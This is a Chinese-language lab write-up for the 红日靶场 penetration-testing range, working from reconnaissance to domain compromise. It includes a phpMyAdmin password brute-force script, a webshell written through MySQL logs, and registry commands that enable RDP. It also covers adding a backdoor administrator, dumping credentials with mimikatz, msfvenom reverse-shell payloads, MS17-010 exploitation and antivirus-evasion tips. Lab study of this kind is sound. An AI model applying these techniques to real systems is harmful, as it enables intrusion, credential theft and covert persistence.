【Penetration】红日靶场（一）

nmap探查存活主机
nmap -sP 10.10.2.0/24
图片: https://uploader.shimo.im/f/cfuQ653BEvyA42FR.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

nmap探查目标主机服务
nmap -sV 10.10.2.145
图片: https://uploader.shimo.im/f/NAPgMmL8pPSn4aqp.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

很多不认识的服务，只能一个个去百度了

对msrpc服务进行探测
msrpc MS Remote Procedure Control
直接谷歌，看看有没有可以利用的

发现一个MS08-067漏洞---MSRPC over SMB，测试了暴露出来的所有端口，并无结果

对MySQL服务进行探测
对服务进行进一步探测
use auxiliary/scanner/mysql/mysql_version
服务确实存在，本想着直接使用 mysql_sql直接连接，然后执行，但似乎没用，猜测是不是只允许内网访问

尝试使用mysql_login模块进行密码爆破
搞了好久，发现有些模块在测试的时候，把ip地址输入错误了，只能重来

百度了，说unauthorized就是不允许访问的意思，估计就是只限内网访问把
对ssl/ms-wbt-server
貌似不好利用，等下再来

对http服务进行探测
网站信息收集

网站的绝对路径是 C:/phpStudy/WWW
数据库采用的是 mysql
php 版本5.4.45

图片: https://uploader.shimo.im/f/dVfiMM4AaXqJGezF.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

直接访问，是一个phpStudy探针，应该就是和phpinfo差不多的东西把
10.10.2.145/l.php
看看探针，为什么下面测试的密码是对的？？？
图片: https://uploader.shimo.im/f/DPmRk4aSwrrSluBA.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8
抓包发现密码是root/root.就是不知道是真的，还是仅仅是探测密码！！！所以开发人员要注意，避免密码泄露

似乎没什么了，先扫描一下目录把
网站返回403，还是需要关注下，这只是说明没有权限访问，但是还是可能存在的

DirBurst直接扫描目录，发现了phpmyadmin，而且密码好像就是root/root，不知道是不是有缓存的原因，，将密码改动了下，再次进行仿真探测
还扫描到了之前上传的 木马，哈哈哈哈，事实证明信息收集很重要

这里还有另外一条路子，就是其实还有一个cms站，里面也有东西，可以直接修改模板，最后叶形成webshell

对phpmyadmin进行密码爆破，但结果发现都是302转发，那怎么判断密码是否正确呢？好像可以设置跟着跳转，又学会了一个新技巧

对phpmyadmin爆破时有个关键点，就是每次访问都会换一个token，所以直接用bp似乎是没法爆破的，除非能自动匹配token并将token放在请求头
图片: https://uploader.shimo.im/f/jKDkmUs8iAAGhLC0.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

直接在网上巴拉了个脚本
from requests import session
from re import findall
from html import unescape

phpmyadmin地址,例如 http://localhost/index.php

target = 'http://localhost/index.php'

要爆破的用户名

user = 'root'

密码字典文件路径

passdic = 'password.txt'

ss = session()
ss.headers = {'Accept': '/', 'Accept-Encoding': 'gzip, deflate',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/87.0.4280.88 Safari/537.36'}

def get_token(text) -> str:
# 获取token
token = findall("name="token" value="(.*?)" />", text)
return unescape(token[0]) if token else None

def get_title(text) -> str:
# 获取标题
title = findall('', text)
return title[0] if title else None

def try_login(user, pwd, token):
# 尝试登陆
data = {'pma_username': user,
'pma_password': pwd,
'server': 1,
'target': 'index.php',
'token': token}
r = ss.post(url=target, data=data)
return r.text

def burst_pma():
# 爆破
with open(passdic, 'r', encoding='utf-8') as f:
html = try_login('', '', '')
title_fail = get_title(html)
token = get_token(html)
for line in f:
pwd = line.strip()
print(f'[?] loading... {user} {pwd} ')
html = try_login(user, pwd, token)
title = get_title(html)
token = get_token(html)
if title != title_fail:
print(f'[√] success {title}')
with open('success.txt', 'a', encoding='utf-8') as f:
f.write(f'{target} | {user} | {pwd}\n')
break
else:
print(f'[×] failed {title}')

try:
    if __name__ == "__main__":
        burst_pma()
except Exception as e:
    print(e)

最后爆破出了密码 123456

拿到phpmyadmin ，直接尝试写入webshell，参考webshell需要什么？？
直接写webshell到刚开始的网站目录下 C:/phpStudy/WWW
发现开启了secure_file_priv ，无法对文件直接写入，尝试log写入，log包括正常log，慢日志，错误日志
成功写入webshell，mima pJack直接连antsword，但似乎连不上，可能有各种原因把，这个时候就尝试用各种webshell工具连接，最终用开山符连接上了

进入内网渗透环节
开山斧似乎无法打开shell，尝试用msfvenmon生成反弹shell，然后上传到靶机，并执行，但好像也要执行命令行执行才行。
换了菜刀，这下文件，shell终于都可以操作了
先用命令行开启3389，可以避免被杀毒软件发现
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /F

reg add    "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fDenyTSConnections /t REG_DWORD /d 0

成功 添加一个用户，并将其添加至本地管理员组和远程桌面组，用于远程桌面访问
net user aur0ra 123.com
net localgroup "Remote Desktop Users" aur0ra /add
net localgroup Administrator aur0ra /add

远程桌面访问会挤出另外一个用户，极有可能被发现，怎么处理？
暂时先直接在靶机上开启，但应该有命令行操作组策略的方法
内网渗透
信息收集
操作见另外一章
1.获取DC
2.通过本地用户，来猜测是否是域用户
3.密码提取工具获取密码，并将密码作为一个字典，用于爆破其他用户
使用mimikatz，抓取密码，但貌似失败了，原因是没有以管理员身份打开
使用mimikatz抓取密码：提权，抓取
aur0ra/123.com
Administrator/123.com
猜测该用户会不会就是域管理员
好家伙，真就是域管理员，那后面不久随意飘了
收集到的信息
域为 god.org
DC---192.168.52.128
获取域用户
Administrator/123.com
通过bat脚本获取系统架构信息

到此已经拿下一台主机

接着以该主机为跳板，递归搜索其他信息
为了集中管理，将所有的会话交给msf

先用msfvenom生成exp，windows优先生成ps脚本，不容易被查杀
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.2.149 LROST=6666 -f psh-reflection > /tmp/evil.ps1
再通过菜刀将文件上传，msf开启监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
...
由于是接着渗透，所以不知道为什么出现3389连接不上，原来是添加的用户仅仅是本地用户，但登录的时候用的是域用户登录的
但还是不能解决单点登录的问题，在这里直接在靶机上，或者通过rdektop临时操作，但实际情况下，会把对方挤下线，从而被发现，所以这中方式肯定是不行的用工具后面自己解决
先学用命令行操作注册表、组策略
再打开3389多点登录的问题
图片: https://uploader.shimo.im/f/jJTDrG7ocXsTyM1P.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8
直接在powershell中执行脚本，发现失败，应该是策略禁止powershell执行
对powershell不同的限制策略
https://blog.csdn.net/Jeffxu_lib/article/details/84710386

修改组策略
Get-ExecutionPolicy 查看ps策略
Get-ExecutionPolicy -List 查看所有的策略
Set-ExecutionPolicy unrestricted修改策略为松
修改失败，发现只能用管理员

不管怎么样都反弹失败，换个exe试试？

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.2.141 LPORT=9999 -f exe -o 123.exe

msfvenom 自动生成木马

还是一样，上传，执行
成功反弹shell
图片: https://uploader.shimo.im/f/wxvnmd9x3EyXlKbf.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

又到了提权阶段
kali中运行Windows-Exploit-Suggester工具
use post/multi/recon/local_exploit_suggester
图片: https://uploader.shimo.im/f/aAtdJ4FtbbxrRyQf.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

不知道为什么提权都失败了

用 background 将会话挂起，想用再用 sessions -i 进行交互就行，还可以使用shell进入靶机命令行

横向咯

先对内网进行扫描，很多东西，这里利用msf自带的扫描模块auxiliary/scanner/netbios/nbname
尽量用一些比较底层的协议进行探测，不容易被发现
使用自带的ping探测
for /L %I in (1,1,254) DO @ping -w 1 -n 1 10.10.2.%I | findstr 0%

这里有点问题，就是findstr的用法。加了双引号和不加的区别

search scanner看msf中的探测模块类型

下面主要常用的扫描模块

auxiliary/scanner/netbios/nbname #探测内网主机的netbios名字
auxiliary/scanner/discovery/arp_sweep #基于arp协议发现内网存活主机，这不能通过代理使用
auxiliary/scanner/portscan/ack #基于tcp的ack回复进行端口扫描，默认扫描1-10000端口
auxiliary/scanner/portscan/tcp #基于tcp进行端口扫描，默认扫描1-10000端口
auxiliary/scanner/discovery/udp_sweep #基于udp协议发现内网存活主机
auxiliary/scanner/discovery/udp_probe #基于udp协议发现内网存活主机
auxiliary/scanner/netbios/nbname #基于netbios协议发现内网存活主机
auxiliary/scanner/ftp/ftp_version #发现内网ftp服务，基于默认21端口
auxiliary/scanner/ssh/ssh_version #发现内网ssh服务，基于默认22端口
auxiliary/scanner/telnet/telnet_version #发现内网telnet服务，基于默认23端口
auxiliary/scanner/dns/dns_amp #发现dns服务，基于默认53端口
auxiliary/scanner/http/http_version #发现内网http服务，基于默认80端口
auxiliary/scanner/http/title #探测内网http服务的标题
auxiliary/scanner/smb/smb_version #发现内网smb服务，基于默认的445端口
use auxiliary/scanner/mssql/mssql_schemadump #发现内网SQLServer服务,基于默认的1433端口
use auxiliary/scanner/oracle/oracle_hashdump #发现内网oracle服务,基于默认的1521端口
auxiliary/scanner/mysql/mysql_version #发现内网mysql服务，基于默认3306端口
auxiliary/scanner/rdp/rdp_scanner #发现内网RDP服务，基于默认3389端口
auxiliary/scanner/redis/redis_server #发现内网Redis服务，基于默认6379端口
auxiliary/scanner/db2/db2_version #探测内网的db2服务，基于默认的50000端口
auxiliary/scanner/discovery/arp_sweep

图片: https://uploader.shimo.im/f/lgt9NUQ1cyGmRJip.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

所以内网主机还有 192.168.52.128|141

对端口服务进行扫描
use auxiliary/scanner/portscan/tcp
对80 445 3389 端口进行扫描

图片: https://uploader.shimo.im/f/0ZEVIYJn4vWzCu2b.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

看看是否存在 ms17-010永恒之蓝漏洞
图片: https://uploader.shimo.im/f/kfodN5tVNiXptPyE.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

还真有

直接使用ms17-010-command执行命令
auxiliary/admin/smb/ms17_010_command
图片: https://uploader.shimo.im/f/VmSQdsD2Rybxcuy5.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

怎么发现又反弹失败呢（以后还是一鼓作气搞完把），exe也没用了，看看还有什么其他的

害，不管了，反正后面就是关于cs和msf联动的东西了，道理都是一样的